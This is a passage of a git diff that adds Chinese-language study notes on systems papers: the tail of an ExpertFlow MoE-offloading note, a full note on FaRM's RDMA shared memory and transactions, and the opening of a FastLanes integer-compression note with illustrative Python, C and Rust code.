plec_allocate_slots( + predicted_demand: dict[int, int], # layer -> 预测激活专家数 + cache_capacity: int, +) -> dict[int, int]: + """ + 按预测需求比例分配跨层缓存槽(PLEC 核心思想)。 + predicted_demand: 如 {0: 3, 1: 2} 表示两层分别需 3、2 个专家槽 + """ + total_demand = sum(predicted_demand.values()) + if total_demand <= cache_capacity: + return predicted_demand + + # 需求超过容量:按预测比例分配整数槽位 + slots = {} + remaining = cache_capacity + layers = sorted(predicted_demand.keys()) + for i, layer in enumerate(layers): + if i == len(layers) - 1: + slots[layer] = remaining + else: + share = max(1, round( + cache_capacity * predicted_demand[layer] / total_demand + )) + share = min(share, remaining - (len(layers) - i - 1)) + slots[layer] = share + remaining -= share + return slots + + +# 预测需 5 个专家,GPU 只能放 4 个 +demand = {0: 3, 1: 2} +print(plec_allocate_slots(demand, cache_capacity=4)) +# 可能输出 {0: 3, 1: 1} — 优先保证近层/高需求层 +``` + +算完一层后,释放的槽位用于 **异步 prefetch** 下一层预测专家;若实际路由与预测不符,ECE 在 expert kernel 运行期间做 **swap 纠错**。 + +--- + +## 实验结果速览 + +**硬件**:单卡 NVIDIA A40(48 GB)+ Intel Xeon Gold 6338。 + +| 场景 | 亮点 | +|------|------| +| Switch-128, WMT16, CS=4 | 相对 SE-MoE **9.99×** 吞吐 | +| Switch 系列 CS=16, BS=32 | 相对 SE-MoE **2.01× / 3.19× / 5.86×**(32/64/128 专家) | +| Mixtral-8×7B | AIG 基线 OOM → ExpertFlow **15.99 GB** 可跑 | +| Qwen1.5 跨域 RPP | 相对 Cache-MoE 最高 **2.21×** | +| 显存 | Switch-128: **15.26 GB → 1.03 GB**(约 93% 降幅) | +| RPP 准确率 | 多数 in-domain **>90%**;Qwen1.5 **>95%** | +| PLEC vs LRU | 命中率 **91.96%** vs LRU 最高约 76%(Switch-32) | +| 仅 TS 消融 | Switch-128 吞吐 **+17%**(1.17×) | + +**Cache size (CS)**:GPU 上能同时驻留的专家数。**Batch size (BS)** 越大,TS 合并相似路由的收益越明显。 + +--- + +## 与相关工作的关系 + +| 方法 | 思路 | ExpertFlow 差异 | +|------|------|-----------------| +| **Cache-MoE** | 每层固定 LRU 缓存 | 无预测,输入相关路由下命中率低 | +| **SE-MoE** | 环缓冲预载连续两层全部专家 | 专家多时内存开销大,常加载未激活专家 | +| **Pregated-MoE** | MLP 预测 router 分数 | 分数误差伤质量;非离散专家选择 | +| **ProMoE** | 学习型预测 + 缓存 | **逐层**预测,无法最早 prefetch | +| **FlexGen / Lamina** | Dense LLM offloading | 未针对 MoE 动态路由 | +| **量化 / 剪枝** | 缩小单个专家 | 正交;ExpertFlow 管「搬不搬、何时搬」 | + +--- + +## 局限与未覆盖点 + +1. **预测器训练成本**:需先跑 MoE 收集路由路径数据集(每配置约 3 万样本);跨模型需重新训练或验证泛化。 +2. **预测错误**:靠 ECE 运行时纠错,极端 mispredict 仍可能增加 I/O stall。 +3. **实现复杂度**:Dual-Batch Pipeline、KV Merge/Reindex、异步 prefetch 对推理引擎侵入较大——论文侧重系统设计,**开源实现需自行跟进**(截至笔记写作时以 arXiv / DAC 论文为主)。 +4. **场景边界**:实验聚焦 **单 GPU offloading**;多卡 EP、训练阶段、与 speculative decoding 的组合未充分展开。 +5. **与 MoE 架构绑定**:Top-1(Switch)与 Top-2/Top-6(Mixtral、DeepSeek)路由机制不同,RPP 需 per-model 适配。 + +--- + +## 自测题 + +1. MoE offloading 的三类瓶颈是什么?ExpertFlow 各用哪个组件应对? +2. 为什么 LRU 在 MoE 推理上不如 PLEC?举一个「4 层 × 4 专家、缓存 8 槽」的例子。 +3. RPP 与 ProMoE 式逐层预测的本质区别是什么?对 prefetch 窗口有何影响? +4. TS 优化目标式 (2) 中,batch 级路由矩阵为什么用逻辑 OR 聚合 token? +5. Dual-Batch Pipeline 如何隐藏 RPP/TS 延迟? + +
+参考答案(先自测再展开) + +1. **预测不准/太晚** → RPP;**专家利用率低**(每专家 token 太少)→ TS;**缓存命中率低** → ECE(PLEC + 纠错)。 +2. LRU 每层均分 2 槽;若某步每层 4 专家全激活,则持续 swap。PLEC 可按预测把 8 槽全给前两层最可能用到的 8 个专家,并随层推进异步换入第三层。 +3. RPP **一次**输出全 `(L,E)` 计划;ProMoE 需层序执行才知道后续层 → ExpertFlow 可在 **第一层 MoE 之前**开始 prefetch。 +4. batch 内任一 token 用到某专家,该专家就必须在该 batch 的 GPU 上可用;OR 表示「本 batch 所需专家集合」。 +5. 当前两 batch 在 GPU 计算时,CPU/GPU 侧并行对**下一**两 batch 跑 RPP+TS,避免预测阻塞主推理路径。 + +
+ +--- + +## 进一步阅读 + +- 论文:[arXiv:2410.17954](https://arxiv.org/abs/2410.17954)(HTML 版含完整方法图) +- MoE 训练系统:[Megatron Core MoE 笔记](./megatron-core-moe-2026.md) +- KV 侧显存管理:[PagedAttention / vLLM 笔记](./paged-attention-vllm.md) +- 基线 Cache-MoE:[Fast inference of mixture-of-experts language models with offloading](https://arxiv.org/abs/2312.17238) +- 逐层预测对比:ProMoE ([2410.22134](https://arxiv.org/abs/2410.22134)) + +--- + +## 一句话总结 + +ExpertFlow 把 MoE 单卡推理从「算到哪层、再慌慌张张搬专家」变成「**先预测全局路由 → 重排 token 提高专家负载 → 预测式缓存 + 算时纠错**」的三段式流水线,在几乎不碰模型权重的前提下,用 **7 MB 级 RPP** 撬动 **10× 级吞吐** 与 **90%+ 级显存节省**——是 **MoE × 异构内存 × 预测调度** 的系统共设计范例。 diff --git a/src/content/docs/papers/farm-2015.md b/src/content/docs/papers/farm-2015.md new file mode 100644 index 000000000..8f8457a47 --- /dev/null +++ b/src/content/docs/papers/farm-2015.md @@ -0,0 +1,287 @@ +--- +title: FaRM — 用 RDMA 把集群内存变成一块「共享白板」 +来源: https://www.microsoft.com/en-us/research/publication/farm-fast-remote-memory/ +日期: 2026-06-13 +子分类: 共识与复制 +分类: 分布式系统 +provenance: pipeline-v3 +--- + +## 从日常类比开始:公司共享白板 vs 快递传话 + +想象一家连锁门店要维护同一份「实时库存表」。 + +**传统 TCP/IP 做法**像**只能打电话改账**:你要改北京仓的库存,得先拨号、等对方接听、口述、对方手写、再回传确认——对方 CPU 全程参与,内核协议栈也要跑一遍。顾客一多,电话占线、接线员(CPU)成为瓶颈。 + +**FaRM 的做法**像**全公司共用一块巨型电子白板**(共享地址空间):你在上海工位可以直接「伸手」读到北京仓那一格数字(**单边 RDMA Read**),不必叫醒北京同事;真要改数时才走一套**分布式事务**(乐观并发 + 两阶段提交),保证所有人看到的版本一致。 + +论文 *FaRM: Fast Remote Memory*(NSDI 2014,Microsoft Research)正是这套思路的工程实现:把集群里每台机器的 DRAM 暴露成**位置透明的共享内存**,用 **RoCE/Infiniband 上的 RDMA** 把远程访问延迟和吞吐做到比 TCP/IP **高一个数量级**。后续 SOSP 2015 论文 *No compromises* 在同一平台上补齐了**非易失内存复制、快速故障恢复**,90 机集群跑 TATP 可达 **1.4 亿 TPS**,单机故障 **<50 ms** 恢复——但本笔记以 NSDI 2014 的编程模型与 RDMA 设计为主干。 + +--- + +## 是什么 + +**FaRM**(Fast Remote Memory)是一个**主内存分布式计算平台**,核心主张: + +| 维度 | 内容 | +|------|------| +| **编程模型** | 集群内存 = 单一共享地址空间;`分配 / 读 / 写 / 释放` 对象,**位置透明** | +| **一致性** | 默认 **严格可串行化** 的 ACID 分布式事务 | +| **网络** | **RDMA** 做数据面(单边读)+ 控制面(基于 RDMA Write 的消息) | +| **性能捷径** | **无锁只读**(单次 RDMA)、**对象共置 + 函数投递**(把分布式事务降成单机事务) | +| **典型数字** | 20 机、40 Gbps RoCE:**1.67 亿次 KV 查找/秒**,延迟 **31 µs** | + +作者:Aleksandar Dragojevic、Dushyanth Narayanan、Orion Hodson、Miguel Castro(Microsoft Research)。 + +--- + +## 为什么重要 + +不理解 FaRM,下面几件事很难讲清楚: + +- 为什么数据中心开始谈 **「内存语义网络」**——不是更快 TCP,而是**绕过远程 CPU** +- **Pilaf / HERD / FaRM / DrTM** 这一脉 RDMA KV 与事务系统的设计分岔 +- 为什么 **RoCE**(RDMA over Converged Ethernet)能在机架级成本上逼近以太网,却让 KV 延迟从百微秒降到几十微秒 +- SOSP 2015 如何证明:**分布式强一致事务**不必在性能上向分区或弱一致「妥协」——前提是重新设计协议以匹配 RDMA + NVRAM 硬件趋势 +- 后来 **Silo、Hekaton、RAMCloud** 等内存 OLTP 论文里「无锁读 / OCC / 日志复制」的谱系关系 + +FaRM 的关键洞察:**本地 DRAM 仍比 RDMA 快约 23×**,所以系统必须帮应用把**热数据与计算共置**;同时,只读路径应尽可能 **one-sided RDMA**,别把远程核卷进临界区。 + +--- + +## 核心概念 + +### 1. RDMA:单边读 vs 双边消息 + +- **单边 RDMA Read/Write**:发起方 NIC 直接 DMA 远程内存,**远程 CPU 不参与** +- **FaRM 消息**:用 **RDMA Write** 写入接收方环形缓冲区;接收方轮询 `Head` 指针发现新消息(依赖 NIC 保证 **Write 按地址递增顺序** 完成) + +微基准(论文 Figure 2–3):16–512 B 典型 RPC 大小下,FaRM 消息速率比 TCP **高 9–11×**;再叠加单边 Read,只读再快 **≈2×**。峰值负载下 TCP 延迟可比 RDMA 消息 **高 145×**。 + +### 2. 共享地址空间与寻址 + +地址 = **32-bit Region ID + 32-bit 偏移**。Region 是 **2 GB** 粒度单元(映射、RDMA 注册、恢复都以 Region 为界)。 + +**一致性哈希**(多虚拟环,k≈100)决定 Region 主副本落在哪台机器;对象指针是 64-bit 不透明地址,可嵌入结构体字段建链表/图。 + +为减少 NIC 页表缓存 miss,FaRM 实现 **PhyCo** 驱动:启动时分配 **2 GB 物理连续** 内存块,让 NIC 页表项从「50 万+」降到 **1 条/Region**。 + +### 3. 分布式事务(OCC + 2PC + RDMA 消息) + +执行阶段:事务缓冲本地写;用 **RDMA Read** 拉取远程对象到 **ObjBuf**。 + +提交阶段(协调者): + +1. **Prepare** → 写集主副本**加锁**,主/副本**写 WAL** +2. **Validate** → 检查读集版本是否仍有效(乐观) +3. **Commit** → 先副本后主,更新对象、解锁 + +全程用低延迟 RDMA 消息,缩短锁持有时间。失败则 Abort。 + +**单机事务快路径**:若相关对象共置在同一 Primary,可 **函数投递**(`msgSend` 把逻辑发到存数据的机器),省掉 Prepare/Validate 的跨机消息,Primary 只需向副本发 Commit。 + +### 4. 无锁只读(Lock-free Read) + +热点读路径(如 KV `GET`)不必进 2PC: + +- 一次 **RDMA Read** 拉整个对象 +- 利用 **cache-coherent DMA**:对象头与各 cache line 携带**版本戳**;头未加锁且各 line 版本一致 → 读与事务**严格可串行化** +- 配合 **incarnation(化身号)** 的 fat pointer,检测对象是否已被并发 `free` + +Hashtable 查找邻桶时还用 **joint version** 保证相邻 bucket 彼此一致。 + +### 5. Chained Associative Hopscotch Hash + +FaRM KV 不是简单 Memcached:在 **Hopscotch** 基础上加 **溢出链 + 关联槽**,在 **90% 装载率** 下平均 **1.04 次 RDMA Read/lookup**(H=8),空间与远程读次数兼顾。 + +写路径(insert/update/delete)则走 **共置 + 事务投递**,把分布式更新变成单机事务。 + +### 6. 与 SOSP 2015 的衔接(扩展阅读) + +NSDI 2014 已包含复制日志到 SSD + 少量 NVRAM 缓冲;SOSP 2015 进一步: + +- Primary-Backup 在 **非易失 DRAM** 上复制 +- **<50 ms** 故障恢复(并行 recovery + 锁恢复阶段极短) +- 90 机 **4.9 TB** 数据库 **1.4 亿 TPS**(TATP) + +读 NSDI 2014 理解「怎么快」;读 SOSP 2015 理解「怎么又快又稳」。 + +--- + +## 代码示例 1:FaRM 风格的事务 API(C,摘自论文 Figure 6) + +FaRM 暴露**事件驱动 + continuation** 接口:异步 RDMA 完成后回调,避免阻塞线程。 + +```c +/* 创建事务上下文 */ +Tx *t = txCreate(); + +/* 在提示地址附近分配新对象(共置优化) */ +Addr neighbor = ...; +txAlloc(t, obj_size, neighbor, on_alloc_done); + +/* 读-改-写 */ +void on_read_done(ObjBuf *old, void *ctx) { + ObjBuf *writable = txWrite(t, old, new_values); + txCommit(t, on_commit_done); +} +txRead(t, obj_addr, obj_size, on_read_done); + +/* 无锁只读快路径 */ +Lf *lf = lockFreeStart(); +lockFreeRead(lf, obj_addr, obj_size, on_lf_read); +lockFreeEnd(lf); /* 释放临时 ObjBuf */ +``` + +**读法**: + +- `txAlloc(..., hint)` 的 hint 让分配器优先**同 block / 同 region / 环上邻近位置**,为后续单机事务铺路 +- `lockFreeStart/End` bracket 的无锁读与事务并发仍 **serializable** +- 真实代码需处理 continuation 链上的 Abort、重试与 incarnation 校验——论文省略了样板 + +--- + +## 代码示例 2:在 FaRM 思路上实现 KV 查找(伪代码) + +下面不是 FaRM 源码,但忠实反映 **chained hopscotch + lock-free read** 的 lookup 逻辑: + +```python +def farm_style_lookup(table_shard, key, fat_ptr_codec): + h = hash(key) + b, b1 = h % N, (h + 1) % N + + # 单次 RDMA:邻桶 b 与 b+1(论文保证 key 必在其中之一或 b 的溢出链) + pair = rdma_read_buckets(table_shard, b, b1) + if not joint_version_ok(pair.fwd, pair.bwd): + continue # 邻桶不一致,退避重试 + + for slot in pair.slots: + if slot.key == key and incarnation_match(slot.fat_ptr): + if slot.is_inline: + return slot.value + obj = rdma_read_object(slot.fat_ptr) + if incarnation_match(slot.fat_ptr, obj): + return obj.value + continue # 对象已被 free/recycle,重试 + + for overflow in walk_overflow_chain(b): + obj = lock_free_read_chain_node(overflow, key) + if obj is not None: + return obj.value + return NOT_FOUND +``` + +**要点**: + +1. **第一次 RDMA 尽量覆盖两个邻桶**——把最常见路径压在 1 次远程读 +2. **joint version** 防止「读到旧 b + 新 b+1」的拼接态 +3. **fat pointer + incarnation** 防止 ABA/free 后重用 + +--- + +## 代码示例 3:RDMA 环形消息通道(发送方逻辑,简化) + +FaRM 用 RDMA Write 实现可靠消息,核心是不覆盖接收方尚未处理的尾部: + +```c +void farm_send(RdmaChannel *ch, const void *msg, size_t len) { + /* 本地缓存的 remote_head 滞后于真实 head,保证不踩未处理数据 */ + while (ch->tail + len > ch->local_copy_remote_head) { + poll_completions(ch); + maybe_refresh_remote_head(ch); /* 接收方处理 ≥50% buffer 才更新 */ + } + rdma_write(ch->conn, ch->buf_remote + ch->tail, msg, len); + ch->tail += len; + rdma_write_u64(ch->conn, &ch->remote_tail_ptr, ch->tail); +} +``` + +接收方轮询 `Head` 非零 → 读 trailer 非零 → 消息完整 → 交付应用 → 清零并推进 head。无远程 CPU 中断。 + +--- + +## 架构一图流 + +```text +┌─────────────┐ RDMA Read (one-sided) ┌─────────────┐ +│ Machine A │ ─────────────────────────────► │ Machine B │ +│ App thread │ │ DRAM Region│ +│ + FaRM lib │ ◄── RDMA Write (msg ring) ───► │ (Primary) │ +└─────────────┘ └──────┬──────┘ + │ │ WAL replicate + │ txCommit / lockFreeRead ▼ + │ ┌─────────────┐ + └────────── shared address space ──────►│ Replica │ + └─────────────┘ +``` + +--- + +## 实践数字(论文实测) + +| 场景 | 配置 | 结果 | +|------|------|------| +| KV 查找 | 20 机,40 Gbps RoCE,YCSB | **167 M ops/s**,**31 µs** 延迟 | +| vs TCP 基线 | 同硬件 | 吞吐 / 延迟 **~10×** 优势 | +| 本地 vs RDMA | 微基准 | 本地内存请求率 **~23×** 于 RDMA | +| TATP(SOSP'15) | 90 机,4.9 TB | **140 M tps**;故障恢复 **<50 ms** | + +FaRM 还实现了类似 Facebook **TAO** 的图存储,相对原 TAO 论文报告值同样有 **数量级** 提升。 + +--- + +## 适用 vs 不适用 + +**适用**: + +- 数据中心内 **内存可放下工作集** 的 OLTP、KV、图遍历(随机读多) +- 已部署 **RoCE / Infiniband**,能换栈 bypass 内核 +- 愿意用 **共置 + 偶尔函数投递** 换极端热点性能 + +**不适用**: + +- 数据必须落盘为主、内存只是缓存且 **无** 复制日志/NVRAM 方案(需另配持久化故事) +- 跨地域 **RTT 毫秒级**——2PC + 多副本验证延迟随 RTT 线性恶化 +- 需要 **多租户强隔离** 于单一 protection domain(FaRM 2014 为单保护域集群) +- 团队无法维护 **PhyCo、NIC 驱动、轮询式** 事件循环等底层调优 + +--- + +## 与相关系统对比 + +| 系统 | 网络 | 事务 | 特点 | +|------|------|------|------| +| **MemC3 / Redis** | TCP | 无 / 弱 | 成熟,但跨机延迟高 | +| **Pilaf** | RDMA | 无 | 极快 KV,无事务 | +| **HERD** | RDMA | 无 | 专注 NIC 侧扩展 | +| **FaRM** | RDMA | 严格 Serializable | 共享内存 + 事务 + 无锁读 | +| **Silo** | TCP(单机) | Serializable | 2013 单机内存 OLTP 标杆 | +| **Hekaton** | 本地 | Serializable | SQL Server 进程内引擎 | +| **Spanner** | WAN | 外部一致 | 跨洲,不同问题域 | + +FaRM 证明:**在机架/集群尺度**,RDMA + 重新设计的 2PC/OCC 可以把「分布式事务」从「只能放弃」变成「默认选项」。 + +--- + +## 踩过的坑(读论文时值得记) + +1. **NIC 页表缓存**:注册内存越多,RDMA 越慢——必须 **大页 / PhyCo 2GB 连续区**,否则 QPS 掉 4×。 +2. **Queue Pair 数量 vs 规模**:每线程每对机器一条 QP 在 78 机上会炸 NIC 缓存;需 **QP 共享**(参数 q)权衡并行度。 +3. **中断 vs 轮询**:用中断/blocking 可能让 RDMA 延迟 **×4**——FaRM 坚持 user-level poll。 +4. **无锁读不是免费午餐**:版本/check 失败要 **随机退避重试**;写热点高时 OCC 验证失败率上升。 +5. **共置是性能前提**:不把相关对象放同一 Primary,就退回完整分布式 2PC——**数据布局是 API 的一部分**。 +6. **NSDI vs SOSP**:2014 论文**不展开**故障恢复细节,但基准已含复制日志开销;完整 HA 故事看 2015。 + +--- + +## 一句话总结 + +FaRM 把「远程内存」做成像 **共享地址空间** 一样好用:默认给你 **严格 Serializable 事务**,读路径则用 **单次 RDMA 无锁读** 榨干 RoCE;再通过 **对象共置与函数投递** 把常见写路径降成单机事务——在 Microsoft 的集群上,这套组合相对 TCP 内存系统实现了 **10× 级** 的延迟与吞吐跃迁,并为后来「**一致性、可用性、性能不必三选一**」的 SOSP 2015 奠定了平台基础。 + +--- + +## 延伸阅读 + +- Dragojević et al., **FaRM: Fast Remote Memory**, NSDI 2014(本笔记主来源) +- Dragojević et al., **No compromises: distributed transactions with consistency, availability, and performance**, SOSP 2015 +- 同仓库笔记:[[hekaton]](单机内存 OLTP)、[[spanner]](全球一致)、[[ix-2014]](数据面 OS 与低延迟网络) diff --git a/src/content/docs/papers/fastertransformer-2021.md b/src/content/docs/papers/fastertransformer-2021.md index d47418acb..aa06914c2 100644 --- a/src/content/docs/papers/fastertransformer-2021.md +++ b/src/content/docs/papers/fastertransformer-2021.md @@ -160,6 +160,7 @@ cache_v: [layer, max_seq_len, n_head, head_dim] - [[orca-2022]] —— Orca — Transformer 生成模型的分布式推理调度 - [[seq2seq-2014]] —— Seq2Seq — 把翻译变成端到端神经网络 - [[tensorrt-llm-2023]] —— TensorRT-LLM — NVIDIA 把 FT 升级成可调度的官方推理栈 +- [[tensorrt-llm-overview]] —— TensorRT-LLM — NVIDIA 开源 LLM 推理优化库零基础笔记 - [[transformer-xl-2019]] —— Transformer-XL — 让 Transformer 像 RNN 那样把上下文滚动传下去 - [[vllm]] —— vLLM — 高吞吐 LLM 推理引擎 diff --git a/src/content/docs/papers/fastlanes-compression.md b/src/content/docs/papers/fastlanes-compression.md new file mode 100644 index 000000000..edc0785c6 --- /dev/null +++ b/src/content/docs/papers/fastlanes-compression.md @@ -0,0 +1,329 @@ +--- +title: FastLanes 压缩布局 — 用标量代码每秒解码超过 1000 亿整数 +来源: https://www.vldb.org/pvldb/vol16/p2132-afroozeh.pdf +日期: 2026-06-13 +子分类: 存储与查询 +分类: 数据库 +provenance: pipeline-v3 +--- + +## 从日常类比开始:流水线装箱 vs 串行拆箱 + +想象你在仓库里要把 **1024 个小零件** 从托盘搬到快递盒里。有两种打包哲学: + +**传统方式(串行)**:按零件编号 1、2、3……依次装箱。工人 A 必须等工人 B 把第 3 号零件放好,才能处理第 4 号——因为 bit 流是 **连续咬合** 的,Unpack 时前后依赖很强,很难让 8 个人同时干不同的活。 + +**FastLanes 方式(分 lane 并行)**:先把 1024 个零件 **重排成 128 条流水线**,每条线上 8 个工位(对应 8-bit 元素宽)。同一工位上的 8 个零件 **互不干扰**,128 条线可以同时推进。即使仓库只有 **scalar 工人**(没有 SIMD 特种装备),现代 CPU 的「宽发射」也能让多条线 **同时开工**;LLVM/GCC 还会自动把「每条线里相同动作」合成 SIMD 指令。 + +这篇 **VLDB 2023** 论文(CWI 的 Azim Afroozeh 与 Peter Boncz)针对列式存储里最常见的 **轻量压缩(Light-Weight Compression, LWC)**——字典(DICT)、帧参考(FOR)、差分(DELTA)、游程(RLE)以及底层的 **bit-packing**——重新设计 **内存布局**,让 **纯标量 C/Rust 代码** 在 Intel、AMD、Apple、AWS 上都能跑到 **每秒解码 >1000 亿整数**(约 **>40 值/CPU 周期**),且 **无需手写 AVX/NEON intrinsics**。 + +开源实现:https://github.com/cwida/FastLanes ;Rust 移植:https://github.com/spiraldb/fastlanes + +--- + +## 是什么 + +**FastLanes** 不是又一种 Snappy/zstd 式的「块压缩器」,而是 **LWC 解码的数据布局 + 虚拟指令集**: + +| 层次 | 传统 Parquet/ORC 痛点 | FastLanes 做法 | +|------|------------------------|----------------| +| Bit-unpack | 比特流顺序依赖,SIMD 难向量化 | **Interleaved layout**:按虚拟 **1024-bit 寄存器** 分 lane | +| DELTA/RLE/FOR | 本质串行,lane 间有依赖 | **Unified Transposed Layout (UTL)**:全表列统一重排 tuple | +| 跨平台 | 维护 AVX2/AVX-512/NEON 多套 intrinsic | **标量写法 + 编译器 auto-vectorize** | +| 批大小 | 各 codec 各自为政 | 统一 **1024 元素** 为一个 FastLane 向量 | + +论文标题里的 **「scalar code」** 指:源码里没有 `_mm256_*` 这类内联汇编式 intrinsic,性能来自 **布局让循环可向量化**,而不是绑死某条 SIMD 方言。 + +--- + +## 为什么重要 + +列式分析(DuckDB、ClickHouse、Spark)和新一代 **FastLanes 文件格式** 的共同逻辑是: + +1. **磁盘/网络带宽** 用 LWC 压下来; +2. **查询速度** 取决于解码是否「几乎免费」。 + +2010 年代常见假设:I/O 慢、CPU 解码不是瓶颈。2020 年代 NVMe、内存带宽、GPU 解码把 **解压 CPU 成本** 推回前台——Parquet 默认 Snappy + 非并行友好的 bitpack,在现代硬件上可能 **解码比读盘还贵**。 + +FastLanes 的核心论点:**换一种比特在内存里的「摆放方式」**,就能在 **不写平台相关 SIMD** 的前提下,把解码吞吐拉高一个数量级,并顺带解决 **ARM vs x86、128-bit vs 512-bit SIMD 宽度不一** 的维护噩梦。 + +--- + +## 核心概念 + +### 1. 轻量压缩(LWC)四件套 + +Analytics 列存里,整数列在进 bit-packing 前通常会先做一层 **语义压缩**: + +| 编码 | 直觉 | 例子 | +|------|------|------| +| **FOR**(Frame of Reference) | 整列减去同一个基准值 | 温度 `[1001,1002,1003]` → 基准 1000,存 `[1,2,3]` | +| **DELTA** | 存相邻差分 | `[10,12,15]` → `[10,2,3]` | +| **RLE** | 连续重复只存 `(值, 次数)` | `[7,7,7,3]` → `(7×3), (3×1)` | +| **DICT** | 低基数列映射到小整数 ID | `"男"/"女"` → `0/1` | + +这些编码 **减小数值幅度** → bit-packing 用更少的 bit 宽度(如 u32 列压成 u5)→ 省空间。FastLanes 对 **上述全部** 提供加速布局,而不只 bitpack 本身。 + +### 2. 虚拟 MM1024 寄存器 + +真实 CPU 最宽 SIMD 今天约 **512 bit(AVX-512)**,FastLanes 定义 **虚拟 1024-bit 寄存器 MM1024**: + +- 一次处理 **1024 个元素**(对 u8 即 1024 bit 有效载荷); +- 源码按 MM1024 写循环,编译器在 256-bit 机器上 **拆成 4 条 256-bit 指令**,在 128-bit NEON 上 **拆成 8 条**——**同一份压缩文件**,无需重编码。 + +对元素位宽 `T`(如 u8 则 T=8),外层 lane 数为: + +```text +lanes = 1024 / T = 128 (当 T=8) +``` + +每个 lane 内,按 **stride = lanes** 访问元素:`input[128 * row + lane]`。 + +### 3. Interleaved bit-packing 布局 + +传统 bitpack:比特 **严格顺序** 流 `[v0|v1|v2|…]`,解第 k 个值要先解完前面所有 bit。 + +FastLanes:把 1024 个 T-bit 值看成 **T 行 × 128 列** 的矩阵,**按列(lane)** 打包:同一 lane 内的元素在比特流里 **对齐、独立**,使内层循环形态为: + +```text +for lane in 0..128: + packed[lane] = f(input[lane], input[lane+128], …) // 相同指令、相同相对偏移 +``` + +这正是 LLVM **loop vectorizer** 最喜欢的模式(类似 `a[i]=b[i]+c[i]`)。 + +### 4. Unified Transposed Layout(UTL)与 `04261537` 序 + +DELTA/RLE 看起来 **高度串行**(第 i 个依赖 i-1)。UTL 的做法:**在写入 FastLanes 文件前,重排整张表的所有列**,把 1024 个 tuple 切成 8 个 chunk(每 chunk 128 行),再按 **`0-4-2-6-1-5-3-7`** 顺序交错排列。 + +这样: + +- 不同 SIMD lane 宽度(8/16/32/64 bit)都能 **最大化独立工作**; +- DELTA 可在 transposed 块内 **向量化前缀和** 的变体; +- 多列用 **同一套重排**,JOIN/scan 时 cache 友好。 + +(完整索引公式见论文 Figure;零基础只需记住:**不是按行号 0,1,2…存,而是故意「洗牌」成 04261537 让硬件开心**。) + +### 5. 标量快 → 编译器变 SIMD + +论文 micro-benchmark:**>40 decoded values / CPU cycle**;3.5 GHz 机器上粗算可达 **>100B integers/s**。 + +关键机制: + +1. **Interleave + UTL** 消除 lane 间 false dependency; +2. 宽发射 CPU 上 **多条 scalar 指令并行飞**; +3. 现代编译器把外层 lane 循环 **auto-vectorize** 成 NEON/AVX——**零 intrinsic 技术债**。 + +--- + +## 代码示例 1:FOR + bit-packing 直觉(Python 伪代码) + +下面用 **极简 Python** 演示 FOR 如何缩小 bit 宽度,以及为何「小整数」对 FastLanes 友好。(非 FastLanes 官方 API,仅为零基础建立数值直觉。) + +```python +def frame_of_reference_encode(values: list[int]) -> tuple[int, list[int]]: + """FOR:找最小值作基准,存偏移量(保证非负)。""" + base = min(values) + deltas = [v - base for v in values] + return base, deltas + +def bits_needed(max_val: int) -> int: + """压成 uW 时需要的 bit 数 W。""" + return max(1, max_val.bit_length()) + +# 模拟一列「接近的传感器读数」 +readings = [1_000_000 + i for i in range(1024)] +base, residuals = frame_of_reference_encode(readings) +W = bits_needed(max(residuals)) + +print(f"原始 u32 列: 1024 × 32 bit = {1024 * 32} bit") +print(f"FOR 后基准={base}, 最大残差={max(residuals)}, 只需 W={W} bit/值") +print(f"Bit-pack 后约: 1024 × {W} bit = {1024 * W} bit") +print(f"压缩比约: {32 / W:.1f}x(仅 bit 宽度层面)") +``` + +FOR 之后残差落在 **0..1023**,只需 **10 bit** 而非 32 bit——FastLanes 的 bitpack kernel 再把这些 10-bit 值按 **lane 布局** 塞进字节数组,解码端即可 **128 条 lane 并行 unpack**。 + +--- + +## 代码示例 2:FastLanes 风格 u8→u3 bitpack 内核(Rust 伪代码) + +摘自论文思路与 [Nick Gates 对 FastLanes Rust 的讲解](https://nickgates.com/notes/life-in-the-fastlanes/):把 **1024 个 u8** 压成 **3 bit/值**,输出 **384 字节**。注意 **lane 循环** 与 **128 stride** 访问模式——这是 auto-vectorize 的关键。 + +```rust +/// 将 1024 个 0..7 的 u8 压成 3-bit 流(每 lane 独立打包) +fn pack_u8_u3(input: &[u8; 1024], packed: &mut [u8; 384]) { + const MASK: u8 = 0b0000_0111; // 只保留 3 bit + const LANES: usize = 128; // 1024 / 8 = 128 + + for lane in 0..LANES { + let mut tmp: u8; + + // 第 0 行:input[lane + 128*0] + tmp = input[lane] & MASK; + tmp |= (input[lane + LANES * 1] & MASK) << 3; + tmp |= (input[lane + LANES * 2] & MASK) << 6; + packed[lane] = tmp; + + // 跨字节 carry:第 3 个值的最高 bit 溢出到下一字节 + tmp = (input[lane + LANES * 2] & MASK) >> 2; + tmp |= (input[lane + LANES * 3] & MASK) << 1; + tmp |= (input[lane + LANES * 4] & MASK) << 4; + tmp |= (input[lane + LANES * 5] & MASK) << 7; + packed[LANES + lane] = tmp; + + tmp = (input[lane + LANES * 5] & MASK) >> 1; + tmp |= (input[lane + LANES * 6] & MASK) << 2; + tmp |= (input[lane + LANES * 7] & MASK) << 5; + packed[LANES * 2 + lane] = tmp; + } +} +``` + +用 `cargo asm` 查看 ARM NEON 时,内层会出现 `and.16b`、`shl.16b` 等 **16 字节宽向量指令**——源码里 **没有** 写 NEON intrinsic,是 LLVM 对 `lane` 循环的自动向量化。 + +**官方 Rust crate 用法**(`spiraldb/fastlanes`)更简洁: + +```rust +use fastlanes::BitPacking; + +const WIDTH: usize = 3; +const PACKED: usize = 128 * WIDTH / size_of::(); + +let mut values = [0u16; 1024]; +for i in 0..1024 { + values[i] = (i % (1 << WIDTH)) as u16; +} + +let mut packed = [0u16; PACKED]; +BitPacking::pack::(&values, &mut packed); + +let mut restored = [0u16; 1024]; +BitPacking::unpack::(&packed, &mut restored); +assert_eq!(values, restored); +``` + +--- + +## 代码示例 3:DELTA 解码为何需要 UTL(C 风格伪代码) + +朴素 delta 解码 **无法** 向量化: + +```c +// 串行:第 i 步依赖 out[i-1] +void delta_decode_serial(const int32_t *enc, int32_t *out, int n) { + out[0] = enc[0]; + for (int i = 1; i < n; i++) + out[i] = out[i - 1] + enc[i]; +} +``` + +FastLanes 在 **UTL 重排后的 1024 块** 内,把依赖拆到 **lane 局部**:每个 lane 先做 **块内前缀和**,再在 lane 之间传递 **单个 carry**(论文称这种结构适合 SIMD `scan`)。零基础可记:**UTL 把「一条长链」拆成「128 条短链 + 少量边界合并」**。 + +```c +// 概念示意:每个 lane 独立扫描 8 个元素(T=32 时 1024/32=32 lanes,此处简化为 4 lanes × 4 元素) +void delta_decode_lane_local(const 